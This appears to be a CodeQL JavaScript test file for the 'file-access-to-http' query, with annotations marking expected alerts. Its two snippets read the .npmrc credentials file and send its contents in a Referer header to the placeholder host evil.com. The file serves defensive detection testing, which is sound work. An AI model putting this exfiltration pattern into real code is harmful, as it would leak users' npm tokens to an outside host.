mirror of
https://github.com/github/codeql.git
synced 2026-04-13 11:04:07 +02:00
29 lines
725 B
JavaScript
29 lines
725 B
JavaScript
var fs = require("fs"),
|
|
https = require("https");
|
|
|
|
var content = fs.readFileSync(".npmrc", "utf8"); // $ Source[js/file-access-to-http]
|
|
https.get({
|
|
hostname: "evil.com",
|
|
path: "/upload",
|
|
method: "GET",
|
|
headers: { Referer: content }
|
|
}, () => { }); // $ Alert[js/file-access-to-http]
|
|
|
|
const fsp = require("fs").promises;
|
|
|
|
(async function sendRequest() {
|
|
try {
|
|
const content = await fsp.readFile(".npmrc", "utf8"); // $ Source[js/file-access-to-http]
|
|
|
|
https.get({
|
|
hostname: "evil.com",
|
|
path: "/upload",
|
|
method: "GET",
|
|
headers: { Referer: content }
|
|
}, () => { }); // $ Alert[js/file-access-to-http]
|
|
|
|
} catch (error) {
|
|
console.error("Error reading file:", error);
|
|
}
|
|
})();
|